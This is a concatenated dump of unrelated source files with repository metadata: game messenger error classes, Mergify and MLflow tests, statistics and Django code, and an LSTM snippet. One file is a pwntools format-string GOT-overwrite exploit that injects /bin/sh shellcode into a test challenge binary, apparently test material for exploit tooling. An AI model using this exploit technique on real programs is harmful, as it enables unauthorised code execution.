from messenger.m_constants import CLIENT_ERROR_NAMES, CLIENT_ACTION_NAMES, CLIENT_ERROR_ID
from messenger.proto.interfaces import IChatError
class I18nErrorID(object):
__slots__ = ('errorID',)
def __init__(self, errorID):
super(I18nErrorID, self).__init__()
self.errorID = errorID
def __repr__(self):
return '{0}'.format(self.getName())
def getName(self):
if self.errorID in CLIENT_ERROR_NAMES:
errorName = CLIENT_ERROR_NAMES[self.errorID]
else:
errorName = 'CLIENT_ERROR_{0}'.format(self.errorID)
return errorName
def getI18nKey(self):
return I18N_MESSENGER.client_error_shared(self.getName())
class I18nActionID(object):
__slots__ = ('actionID',)
def __init__(self, actionID):
super(I18nActionID, self).__init__()
self.actionID = actionID
def __repr__(self):
return '{0}'.format(self.getName())
def getName(self):
if self.actionID in CLIENT_ACTION_NAMES:
actionName = CLIENT_ACTION_NAMES[self.actionID]
else:
actionName = 'CLIENT_ACTION_{0}'.format(self.actionID)
return actionName
def getI18nName(self):
name = self.getName()
key = I18N_MESSENGER.client_action(name)
if key:
name = i18n.makeString(key)
return name
class ClientError(IChatError):
__slots__ = ('_error', '_kwargs')
def __init__(self, errorID, **kwargs):
self._error = self.createError(errorID)
self._kwargs = kwargs
def __repr__(self):
return '{0}(error={1})'.format(self.__class__.__name__, self._error)
def createError(self, errorID):
return I18nErrorID(errorID)
def getErrorID(self):
return self._error.errorID
def getErrorName(self):
return self._error.getName()
def getMessage(self):
key = self._error.getI18nKey()
if key:
result = i18n.makeString(key, **self._kwargs)
else:
result = self._error.getName()
if self._kwargs:
result = '{0}/{1}'.format(result, self._kwargs)
return result
class ClientActionError(ClientError):
__slots__ = ('_action',)
def __init__(self, actionID, errorID = None, **kwargs):
super(ClientActionError, self).__init__((errorID or CLIENT_ERROR_ID.GENERIC), **kwargs)
self._action = self.createAction(actionID)
def __repr__(self):
return '{0}(action={1}, error={2})'.format(self.__class__.__name__, self._action, self._error)
def createAction(self, actionID):
return I18nActionID(actionID)
def getActionID(self):
return self._action.actionID
def getMessage(self):
if 'actionName' not in self._kwargs:
self._kwargs['actionName'] = self._action.getI18nName()
return super(ClientActionError, self).getMessage()
class ChatCoolDownError(ClientActionError):
def __init__(self, actionID, coolDown = None):
if coolDown:
kwargs = {'floatArg1': coolDown}
else:
kwargs = {}
super(ChatCoolDownError, self).__init__(actionID, CLIENT_ERROR_ID.COOLDOWN, **kwargs)
def getMessage(self):
actionName = self._action.getI18nName()
if self._kwargs:
msg = i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_ACTION_IN_COOLDOWN, actionName=actionName, **self._kwargs)
else:
msg = i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_ACTION_IN_COOLDOWN_WO_PERIOD, actionName=actionName)
return msg
class ChatBanError(IChatError):
__slots__ = ('_endTime', '_reason')
def __init__(self, endTime, reason):
super(ChatBanError, self).__init__()
self._endTime = endTime
self._reason = reason
def getTitle(self):
return i18n.makeString(I18N_MESSENGER.SERVER_ERRORS_CHATBANNED_TITLE)
def getMessage(self):
if self._endTime:
banEndTime = BigWorld.wg_getLongDateFormat(self._endTime) + ' ' + BigWorld.wg_getShortTimeFormat(self._endTime)
msg = i18n.makeString('#chat:errors/chatbanned', banEndTime=banEndTime, banReason=self._reason)
else:
msg = i18n.makeString('#chat:errors/chatbannedpermanent', banReason=self._reason)
return msg
def isModal(self):
return True
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\messenger\proto\shared_errors.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:30:28 Střední Evropa (běžný čas)
| [
"info@webium.sk"
] | info@webium.sk |
b14a6a992a76e45e9bff3f37e5aee488de432395 | 66b504cac41d9e02ef605613ef86911e647b7584 | /mergify_engine/tests/functional/actions/test_request_reviews.py | 5aa49cf05b92501795632c8df178d32ab52849e3 | [
"Apache-2.0"
] | permissive | Nytelife26/mergify-engine | 894217f88b93ed48df6f8700cf955826dad3173a | 98c2119e26021a39c7985baccf4f3e35500e7ab2 | refs/heads/master | 2023-04-04T09:48:06.904066 | 2021-04-08T18:29:40 | 2021-04-09T16:21:04 | 356,945,975 | 0 | 0 | Apache-2.0 | 2021-04-11T18:21:27 | 2021-04-11T18:21:27 | null | UTF-8 | Python | false | false | 6,561 | py | # -*- encoding: utf-8 -*-
#
# Copyright © 2018–2020 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
import pytest
import yaml
from mergify_engine import context
from mergify_engine.actions import request_reviews
from mergify_engine.tests.functional import base
class TestRequestReviewsAction(base.FunctionalTestBase):
async def test_request_reviews_users(self):
rules = {
"pull_request_rules": [
{
"name": "request_reviews",
"conditions": [f"base={self.master_branch_name}"],
"actions": {"request_reviews": {"users": ["mergify-test1"]}},
}
]
}
await self.setup_repo(yaml.dump(rules))
p, _ = await self.create_pr()
await self.run_engine()
pulls = await self.get_pulls(base=self.master_branch_name)
assert 1 == len(pulls)
requests = await self.get_review_requests(pulls[0]["number"])
assert sorted(["mergify-test1"]) == sorted(
user["login"] for user in requests["users"]
)
async def test_request_reviews_teams(self):
team = (await self.get_teams())[0]
await self.add_team_permission(team["slug"], "push")
rules = {
"pull_request_rules": [
{
"name": "request_reviews",
"conditions": [f"base={self.master_branch_name}"],
"actions": {"request_reviews": {"teams": [team["slug"]]}},
}
]
}
await self.setup_repo(yaml.dump(rules))
p, _ = await self.create_pr()
await self.run_engine()
pulls = await self.get_pulls(base=self.master_branch_name)
assert 1 == len(pulls)
requests = await self.get_review_requests(pulls[0]["number"])
assert sorted([team["slug"]]) == sorted(
team["slug"] for team in requests["teams"]
)
@mock.patch.object(
request_reviews.RequestReviewsAction, "GITHUB_MAXIMUM_REVIEW_REQUEST", new=1
)
async def test_request_reviews_already_max(self):
rules = {
"pull_request_rules": [
{
"name": "approve",
"conditions": [f"base={self.master_branch_name}"],
"actions": {"review": {"type": "APPROVE"}},
},
{
"name": "request_reviews",
"conditions": [f"base={self.master_branch_name}"],
"actions": {
"request_reviews": {"users": ["mergify-test1", "mergify-test"]}
},
},
]
}
await self.setup_repo(yaml.dump(rules))
p, _ = await self.create_pr()
await self.run_engine()
pulls = await self.get_pulls(base=self.master_branch_name)
assert 1 == len(pulls)
requests = await self.get_review_requests(pulls[0]["number"])
assert ["mergify-test1"] == [user["login"] for user in requests["users"]]
ctxt = await context.Context.create(self.repository_ctxt, p, [])
checks = await ctxt.pull_engine_check_runs
assert len(checks) == 2
for check in checks:
if check["name"] == "Rule: request_reviews (request_reviews)":
assert "neutral" == check["conclusion"]
assert (
"Maximum number of reviews already requested"
== check["output"]["title"]
)
assert (
"The maximum number of 1 reviews has been reached.\n"
"Unable to request reviews for additional users."
== check["output"]["summary"]
)
break
else:
pytest.fail("Unable to find request review check run")
@mock.patch.object(
request_reviews.RequestReviewsAction, "GITHUB_MAXIMUM_REVIEW_REQUEST", new=2
)
async def test_request_reviews_going_above_max(self):
rules = {
"pull_request_rules": [
{
"name": "request_reviews",
"conditions": [
f"base={self.master_branch_name}",
"#review-requested>0",
],
"actions": {
"request_reviews": {
"users": ["mergify-test1", "mergify-test3"],
"teams": ["mergifyio-testing/testing"],
}
},
},
]
}
await self.setup_repo(yaml.dump(rules))
p, _ = await self.create_pr()
await self.run_engine()
pulls = await self.get_pulls(base=self.master_branch_name)
assert 1 == len(pulls)
await self.create_review_request(pulls[0]["number"], ["mergify-test1"])
await self.run_engine()
requests = await self.get_review_requests(pulls[0]["number"])
assert sorted(["mergify-test1", "mergify-test3"]) == sorted(
user["login"] for user in requests["users"]
)
ctxt = await context.Context.create(self.repository_ctxt, p, [])
checks = await ctxt.pull_engine_check_runs
assert len(checks) == 2
for check in checks:
if check["name"] == "Rule: request_reviews (request_reviews)":
assert "neutral" == check["conclusion"]
assert (
"Maximum number of reviews already requested"
== check["output"]["title"]
)
assert (
"The maximum number of 2 reviews has been reached.\n"
"Unable to request reviews for additional users."
== check["output"]["summary"]
)
break
else:
pytest.fail("Unable to find request review check run")
| [
"37929162+mergify[bot]@users.noreply.github.com"
] | 37929162+mergify[bot]@users.noreply.github.com |
194e207bc958493908fac766954695e21e84316a | 7b65a38aca6fc4fb6f39bc5de1e0f352f3ab7e25 | /s9/9.1_espacios.py | b37d38a4121ed466d8d9f17a99e7eb815f8d0ca6 | [] | no_license | camohe90/-mision_tic_G1 | 96b10e4ae14278cf53f0a87638643112e2f81709 | f083c8a0a133b9be1a8d6e8f61cde46cd1aa75e5 | refs/heads/master | 2023-05-26T03:53:25.660868 | 2021-06-09T12:44:48 | 2021-06-09T12:44:48 | 371,374,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | # Usando 4 espacios
def es_par(num):
if num % 2 == 0:
print("par")
return True
else:
return False
| [
"camohe90@gmail.com"
] | camohe90@gmail.com |
dc227e7b0d70151dd193d560dc8cd7da9835d83e | 41d9b92ef2a74a4ba05d27ffbe3beb87884c4ce7 | /math/0x03-probability/normal.py | 5db0c14284738923b0e7d0984afd2984ea74f577 | [] | no_license | JosephK89/holbertonschool-machine_learning | 3f96d886c61d8de99a23e4348fb045b9c930740e | aa5c500f7d8ebeec951f9ab5ec017cae64007c25 | refs/heads/main | 2023-08-14T18:42:53.481354 | 2021-10-10T19:53:40 | 2021-10-10T19:53:40 | 386,248,140 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,529 | py | #!/usr/bin/env python3
"""normal distribution module"""
class Normal:
""""Noraml class"""
def __init__(self, data=None, mean=0., stddev=1.):
"""initialization"""
if data is None:
if stddev <= 0:
raise ValueError("stddev must be a positive value")
else:
self.mean = float(mean)
self.stddev = float(stddev)
else:
if type(data) != list:
raise TypeError("data must be a list")
elif len(data) < 2:
raise ValueError("data must contain multiple values")
else:
self.mean = (sum(data) / len(data))
s = 0
for x in range(0, len(data)):
s = s + ((data[x] - self.mean))**2
self.stddev = (s/len(data))**(1/2)
def z_score(self, x):
"""z-score function"""
return ((x - self.mean) / self.stddev)
def x_value(self, z):
"""x-value function"""
return self.stddev * z + self.mean
def pdf(self, x):
"""pdf function"""
return (2.7182818285**((-1/2) * (((
x - self.mean) / self.stddev)**2))) * (
1 / (self.stddev * (2 * 3.1415926536) ** (1/2)))
def cdf(self, x):
"""cdf function"""
num = (x - self.mean) / (self.stddev * (2**(1/2)))
erf = (2 / (3.1415926536**(1/2))) * (num - (num**3)/3 + (
num**5)/10 - (num**7)/42 + (num**9)/216)
return (1 / 2) * (1 + erf)
| [
"josephkamel262@gmail.com"
] | josephkamel262@gmail.com |
a1f3baae2ae7d957d069289b1f36d2f680d3f886 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=12/params.py | 106ee852332fe69aea38aeb0a6597ada33dc539f | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | {'cpus': 4,
'duration': 30,
'final_util': '2.525095',
'max_util': '2.5',
'periods': 'harmonic-2',
'release_master': False,
'res_distr': '0.5',
'res_nmb': '4',
'res_weight': '0.06',
'scheduler': 'GSN-EDF',
'trial': 12,
'utils': 'uni-medium-3'}
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
8127981a06daf63dd10904afe21974e27bd20512 | 580905861e3bdd1990cde76ba2b057c898e6f088 | /Django_Stuff/class_based_views/basic_app/urls.py | 8096ed097b0ecd3ea89f8ca6fa5ecf60bc74a0e5 | [
"MIT"
] | permissive | muhammad-mamdouh/Django_Projects | 14eddfdc25aa4be43c5d35e30c5efb146e255101 | 1f31e12aefb36b33474256db40a2c551882f445e | refs/heads/master | 2022-12-10T20:02:38.918760 | 2019-12-14T21:24:08 | 2019-12-14T21:24:08 | 198,602,869 | 0 | 1 | null | 2022-11-22T04:13:34 | 2019-07-24T09:28:59 | Python | UTF-8 | Python | false | false | 487 | py | from django.urls import path
from . import views
app_name = 'basic_app'
urlpatterns = [
path('', views.SchoolListView.as_view(), name='schools_list'),
path('<int:pk>/', views.SchoolDetailView.as_view(), name='school_details'),
path('create/', views.SchoolCreateView.as_view(), name='school_create'),
path('update/<int:pk>/', views.SchoolUpdateView.as_view(), name='school_update'),
path('delete/<int:pk>/', views.SchoolDeleteView.as_view(), name='school_delete'),
]
| [
"mahammad.mamdouh@gmail.com"
] | mahammad.mamdouh@gmail.com |
97539f5418cf3928aff3692de719426093e91949 | aa4901a8e75bb31e27a5088ec6e53494e19ea48e | /main/api/permissions.py | 594a2774c732f6e32c3c5f783d4ad4017cca2407 | [] | no_license | ByAvatarOff/SameTinder | e65cbbcc25a383e10c602de235e6f38bd5917f98 | 3e89c572c2edb78286f136f87cc3ff4846bd2059 | refs/heads/master | 2023-05-27T20:07:22.188835 | 2021-06-09T10:42:32 | 2021-06-09T10:42:32 | 335,273,909 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | from rest_framework.permissions import BasePermission, SAFE_METHODS
class IsOwnerProfile(BasePermission):
def has_object_permission(self, request, view, obj):
print(obj, view, obj.user.username)
print(obj.user != request.user)
return obj.user != request.user | [
"tsp7439@gmail.com"
] | tsp7439@gmail.com |
959059b948a2b693180c69490a916f6139a44483 | f95d2646f8428cceed98681f8ed2407d4f044941 | /day40/test_lock.py | daad077e967e8ed2e3bf02e29c495f046ca8dacf | [] | no_license | q2806060/python-note | 014e1458dcfa896f2749c7ebce68b2bbe31a3bf8 | fbe107d668b44b78ae0094dbcc7e8ff8a4f8c983 | refs/heads/master | 2020-08-18T01:12:31.227654 | 2019-10-17T07:40:40 | 2019-10-17T07:40:40 | 215,731,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | from threading import Lock, Thread
m = 0
n = 0
def f1():
while True:
with lock:
if m != n:
print('m =', m, 'n =', n)
if __name__ == '__main__':
lock = Lock()
t = Thread(target=f1)
t.start()
while True:
with lock:
m += 1
n += 1
t.join()
| [
"C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn"
] | C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn |
a28e70a40e954a2b65089db852c5a4ebf621fa2c | 0b932d446d88013fadb8c4e0dd3ca3cc4a1a5de3 | /localizacion/inte_nro_control_secuencial/__manifest__.py | 3fe660f1f411281f17218061b50905c915108f7f | [] | no_license | grudiver/biumak | cd8e7477bba3389b2144fa6d35cd89d2eaf0210f | 65705737f16da087b6cb01f725236e7bc9c59c86 | refs/heads/master | 2022-04-11T13:17:33.347975 | 2020-03-24T17:55:24 | 2020-03-24T17:55:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | # coding: utf-8
###########################################################################
##############################################################################
{
"name": "Números de control SENIAT automaticos TYSAMNCA",
"version": "1.0",
"author": "Tysamnca",
"license": "AGPL-3",
"category": "Sales",
#"website": "http://www.tysamnca.com/",
"colaborador":"Nathaly Partidas",
"depends": [
"account",
"l10n_ve_fiscal_requirements",
"base"
],
'demo': [
],
"data": [
'view/invoice_view.xml',
],
'test': [
],
"installable": True,
} | [
"soporte.innova2129@gmail.com"
] | soporte.innova2129@gmail.com |
07a6a238b645d7e22766752b4f28aa6af2f7adf2 | 52243c4a05a296e7c042663b5942faa47eb66aee | /common_nlp/historico_processo.py | 0ae114414b1095471ef1bb0480d7dbc6e4ac3f52 | [
"MIT"
] | permissive | joaoppadua/Pesquisas | fbe0311b59340c041732d6d1f7f4862fa6c53198 | 808d8b0ef9e432e05a4f284ce18778ed8b3acd96 | refs/heads/master | 2023-07-16T02:50:30.846205 | 2021-09-03T13:34:54 | 2021-09-03T13:34:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,954 | py | from parserTextoJuridico import parserTextoJuridico
import pandas as pd, json, arrow
class historico_processo(parserTextoJuridico):
"""Classe para obtenção de histórico do processo"""
def __init__(self):
super().__init__()
self.batch_publicacoes = 1000
self.historico = None
self.id_processo = None
self.processos_analisados = []
self.numero_processo = None
def andamentos_id_regex(self, cursor, regex, upper_bound, lower_bound=0):
for n in range(lower_bound, self.batch_publicacoes):
publicacoes = self.download_publicacoes(cursor, n)
for numero, texto in publicacoes:
if numero not in self.processos_analisados and re.search(regex, texto):
self.processos_analisados.append(numero)
lista_numeros_procurar = '"'
for p in self.processos_analisados:
lista_numeros_procurar += p + '",'
lista_numeros_procurar += '"'
cursor.execute(
"SELECT id from diarios.numero_proc where numero in (%s);"
% (lista_numeros_procurar)
)
lista_ids = [i[0] for i in cursor.fetchall()]
return lista_ids
def atualiza_historico(self, andamentos):
for tribunal, data_pub, texto, classe_publicacao in andamentos:
if classe_publicacao == "NULL" or classe_publicacao == "":
classe = self.classifica_texto(texto)
if classe == "Certidão":
self.historico["certidões"].append((data_pub, tribunal, texto))
elif (
classe == "Agravo"
or classe == "Mandado de Segurança"
or classe == "Embargos declaratórios"
or classe == "Recurso"
):
self.historico["recursos"].append((data_pub, tribunal, texto))
elif classe == "Movimento processual":
self.historico["movimentações processuais"].append(
(data_pub, tribunal, texto)
)
elif classe == "Sentença" or classe == "Homologação de acordo":
self.historico["sentença"].append((data_pub, tribunal, texto))
elif classe == "Liminar":
self.historico["liminares"].append((data_pub, tribunal, texto))
else:
self.historico["outras movimentações"].append(
(data_pub, tribunal, texto)
)
self.tempo_duracao()
def atualiza_historico_existente(self, novos_andamentos, historico_p=None):
# Para o caso de armazenar o histórico e posteriormente atualizá-lo com novos andamentos
if historico_p:
self.load_historico(historico_p)
self.atualiza_historico(novos_andamentos)
def criar_historico(self, andamentos):
# FALTA
# perícia
# execução
self.historico = {
# tuples com (data,tribunal, texto)
"audiencias": [],
# tuples com (data,tribunal, texto)
"certidões": [],
# data única da última distribuição
"distribuição": None,
# tuples com (data, tribunal, texto)
"liminares": [],
# tuples com (data, tribunal, texto)
"movimentações processuais": [],
# tuples com (data, tribunal, texto)
"outras movimentações": [],
# tuples com (data, tribunal, texto)
"recursos": [],
# tuple com (data, tribunal, texto)
"sentença": [],
# dicionário com o tempo de duração do processo
"tempo de duração": {
"Audiência a sentença": None,
"Citação a sentença": None,
"Distribuição a audiência": None,
"Distribuição a sentença": None,
},
}
self.atualiza_historico(andamentos)
def download_publicacoes(self, cursor, lower_bound):
cursor.execute(
"SELECT numero, texto from diarios.publicacoes_diarias limit %s, %s"
% (lower_bound, self.batch_publicacoes)
)
dados = cursor.fetchall()
return dados
def historico_as_string(self):
# para armazenar o histórico como um json
return json.dumps(self.historico)
def load_historico(self, historico):
# para processar um histórico do processo
self.historico = json.loads(historico)
def tempo_duracao(self):
# FALTA:
# Saber como encontrar certidão ref a mandado de citação cumprido
# Saber como encontrar data de distribuição
if not self.historico:
return None
data_distribuicao = None
data_audiencia = None
data_sentenca = None
if self.historico["distribuição"]:
data_distribuicao = arrow.get(self.historico["distribuição"], "DD/MM/YYYY")
if len(self.historico["audiencias"]):
data_audiencia = arrow.get(
self.historico["audiencias"][-1][1], "DD/MM/YYYY"
)
if len(self.historico["sentença"]):
data_sentenca = arrow.get(self.historico["sentença"][-1][1], "DD/MM/YYYY")
if data_sentenca:
if data_audiencia:
self.historico["tempo de duração"]["Audiência a sentença"] = (
data_sentenca - data_audiencia
).days
if data_distribuicao:
self.historico["tempo de duração"]["Distribuição a sentença"] = (
data_sentenca - data_distribuicao
).days
if data_distribuicao and data_audiencia:
self.historico["tempo de duração"]["Distribuição a audiência"] = (
data_audiencia - data_distribuicao
).days
def main():
pass
if __name__ == "__main__":
main()
| [
"danilopcarlotti@gmail.com"
] | danilopcarlotti@gmail.com |
d48c7d8e186158688fa8c2d9fb45afdee4e40eee | d28bd8a27dd33e8140f2dc48ae169b8c0fe46147 | /setup.py | 301b47df2fa164da557c51ec1ff11a2069a127f4 | [] | no_license | marians/agssearch | b622de07b154ffdc688d477eb8ada66b516f8a64 | 3cabcaffda87347860072397a8e21773f217fad5 | refs/heads/master | 2016-09-05T11:30:19.978140 | 2014-01-26T12:45:22 | 2014-01-26T12:45:22 | 9,577,467 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | # encoding: utf-8
from setuptools import setup
try:
import pypandoc
description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
description = ''
setup(name='agssearch',
version='0.4',
description='Python client for the German Destatis Gemeindeverzeichnis',
long_description=description,
author='Marian Steinbach',
author_email='marian@sendung.de',
url='https://github.com/marians/agssearch',
packages=['agssearch'],
install_requires=[
'lxml',
'mechanize'
],
entry_points={
'console_scripts': ['agssearch = agssearch.agssearch:main']
})
| [
"marian@sendung.de"
] | marian@sendung.de |
a650ff2e726fa3c8a71871ebc3fe44fa460c67d6 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /08_FmtString-unit-tests/10_32/verified-exploit-FsGotShellcode.py | 267c686b65001ace4568decd888bfabf4113bbdb | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,583 | py | # +------------------------------------------------+
# | Atack: Format String GOT Shellcode |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf
target = process("./chall-test_FmtString-10-x86")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (92)
fs = sf.WriteFmtStr(
arch = 32,
value = -0x36,
address = 0x804b2d8,
offset = 0x4,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = ret_address,
address_base = 0)
payload = sf.BufferOverflow(arch=32, start=92)
payload.add_bytes(92, fs.generate_fmt_str())
payload.add_bytes(54, b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80")
target.sendline(payload.generate_payload())
target.interactive()
# +------------------------------------------------+
# | Artist: Avenged Sevenfold |
# +------------------------------------------------+
# | Song: Bat Country |
# +------------------------------------------------+
# | Scared but you can follow me |
# | I'm |
# | Too weird to live but much to rare |
# | to die |
# +------------------------------------------------+
| [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
93366da9c13ccb209b3b624ab0008ae69ab264fb | 80810054516ddc3fd93e916de4bf7e3e07d871b0 | /1-books/book2_TensorFlow实战Google深度学习框架(第二版)/practice/LSTM_test1.py | cbed959b70b74bac7a7f453e2de3150c42bb2b24 | [] | no_license | TinyHandsome/BookStudy | df9ca668f2dd1b51b1e364c22bc531394a03eeae | 69c9018bb70893f74a44e4df9f3d3e39467de3f6 | refs/heads/master | 2023-09-04T03:06:43.918259 | 2023-09-01T04:27:01 | 2023-09-01T04:27:01 | 184,217,837 | 18 | 17 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# coding=utf-8
"""
@author: Li Tian
@contact: 694317828@qq.com
@software: pycharm
@file: LSTM_test1.py
@time: 2018/12/23 13:37
@desc: LSTM测试1
"""
import tensorflow as tf
# 定义一个LSTM结构。再Tensorflow中通过一句简单的命令就可以实现一个完整的LSTM结构。
# LSTM中使用的变量也会在该函数中自动被声明
lstm = tf.nn.rnn_cell.BasicLSTMCell(lstm_hidden_size)
# 将LSTM中的状态初始化为全0数组。BasicLSTMCell类提供了zero_state函数来生成全零的初始状态。state是一个包含两个张量的
# LSTMStateTuple类,其中state.c和state.h分别对应了图中的c状态和h状态。
# 和其他神经网络类似,在优化循环神经网络时,每次也会使用一个batch的训练样本。
# 以下代码中,batch_size给出了一个batch的大小。
state = lstm.zero_state(batch_size, tf.float32)
# 定义损失函数。
loss = 0.0
# 虽然在测试时循环神经网络可以处理任意长度的序列,但是在训练中为了将循环网络展开成前馈神经网络,我们需要知道训练数据的序列长度。
# 在以下代码中,用num_steps来表示这个长度。第9章将介绍使用dynamic_rnn动态处理变长序列的方法。
for i in range(num_steps):
# 在第一个时刻声明LSTM结构中使用的变量,在之后的时刻都需要复用之前定义好的变量。
if i > 0:
tf.get_variable_scope().reuse_variables()
# 每一步处理时间序列中的一个时刻。将当前输入current_input(xt)和前一时刻状态state(ht-1和ct-1)闯入定义的LSTM结构
# 可以得到当前LSTM的输出lstm_output(ht)和更新后的状态state(ht和ct)。lstm_output用于输出给其他层,state用于输出给
# 下一时刻,它们在dropout等方面可以有不同的处理方式。
lstm_output, state = lstm(current_input, state)
# 将当前时刻LSTM结构的输出传入一个全连接层得到最后的输出。
final_output = fully_connected(lstm_output)
# 计算当前时刻输出的损失。
loss += calc_loss(final_output, expected_output)
# 使用类似第4章中介绍的方法训练模型。
| [
"694317828@qq.com"
] | 694317828@qq.com |
25a74194ca6e00f498d76dc01fac448dabd6dcdc | 5d28c38dfdd185875ba0edaf77281e684c81da0c | /tests/projects/backend/test_local.py | 6d2c431abc4dfb26ae7324c1182734a9f5c5ff01 | [
"Apache-2.0"
] | permissive | imrehg/mlflow | 3a68acc1730b3ee6326c1366760d6ddc7e66099c | 5ddfe9a1b48e065540094d83125040d3273c48fa | refs/heads/master | 2022-09-24T05:39:02.767657 | 2022-09-20T00:14:07 | 2022-09-20T00:14:07 | 244,945,486 | 1 | 0 | Apache-2.0 | 2020-03-04T16:11:54 | 2020-03-04T16:11:53 | null | UTF-8 | Python | false | false | 3,187 | py | import os
from unittest import mock
from mlflow.projects.backend.local import _get_docker_artifact_storage_cmd_and_envs
def test_docker_s3_artifact_cmd_and_envs_from_env():
mock_env = {
"AWS_SECRET_ACCESS_KEY": "mock_secret",
"AWS_ACCESS_KEY_ID": "mock_access_key",
"MLFLOW_S3_ENDPOINT_URL": "mock_endpoint",
"MLFLOW_S3_IGNORE_TLS": "false",
}
with mock.patch.dict("os.environ", mock_env), mock.patch(
"posixpath.exists", return_value=False
):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs("s3://mock_bucket")
assert cmds == []
assert envs == mock_env
def test_docker_s3_artifact_cmd_and_envs_from_home():
mock_env = {}
with mock.patch.dict("os.environ", mock_env), mock.patch(
"posixpath.exists", return_value=True
), mock.patch("posixpath.expanduser", return_value="mock_volume"):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs("s3://mock_bucket")
assert cmds == ["-v", "mock_volume:/.aws"]
assert envs == mock_env
def test_docker_wasbs_artifact_cmd_and_envs_from_home():
# pylint: disable=unused-import
from azure.storage.blob import BlobServiceClient
mock_env = {
"AZURE_STORAGE_CONNECTION_STRING": "mock_connection_string",
"AZURE_STORAGE_ACCESS_KEY": "mock_access_key",
}
wasbs_uri = "wasbs://container@account.blob.core.windows.net/some/path"
with mock.patch.dict("os.environ", mock_env), mock.patch(
"azure.storage.blob.BlobServiceClient"
):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs(wasbs_uri)
assert cmds == []
assert envs == mock_env
def test_docker_gcs_artifact_cmd_and_envs_from_home():
mock_env = {
"GOOGLE_APPLICATION_CREDENTIALS": "mock_credentials_path",
}
gs_uri = "gs://mock_bucket"
with mock.patch.dict("os.environ", mock_env, clear=True):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs(gs_uri)
assert cmds == ["-v", "mock_credentials_path:/.gcs"]
assert envs == {"GOOGLE_APPLICATION_CREDENTIALS": "/.gcs"}
def test_docker_hdfs_artifact_cmd_and_envs_from_home():
mock_env = {
"MLFLOW_KERBEROS_TICKET_CACHE": "/mock_ticket_cache",
"MLFLOW_KERBEROS_USER": "mock_krb_user",
"MLFLOW_PYARROW_EXTRA_CONF": "mock_pyarrow_extra_conf",
}
hdfs_uri = "hdfs://host:8020/path"
with mock.patch.dict("os.environ", mock_env, clear=True):
cmds, envs = _get_docker_artifact_storage_cmd_and_envs(hdfs_uri)
assert cmds == ["-v", "/mock_ticket_cache:/mock_ticket_cache"]
assert envs == mock_env
def test_docker_local_artifact_cmd_and_envs():
host_path_expected = os.path.abspath("./mlruns")
container_path_expected = "/mlflow/projects/code/mlruns"
cmds, envs = _get_docker_artifact_storage_cmd_and_envs("file:./mlruns")
assert cmds == ["-v", "{}:{}".format(host_path_expected, container_path_expected)]
assert envs == {}
def test_docker_unknown_uri_artifact_cmd_and_envs():
cmd, envs = _get_docker_artifact_storage_cmd_and_envs("file-plugin://some_path")
assert cmd == []
assert envs == {}
| [
"noreply@github.com"
] | imrehg.noreply@github.com |
4aa8d69e3fc68379c480897545f8d19475acb2d8 | febeffe6ab6aaa33e3a92e2dbbd75783a4e32606 | /ssseg/cfgs/ce2p/base_cfg.py | 53ab052f882aa2949da132381458f39250509ae2 | [
"MIT"
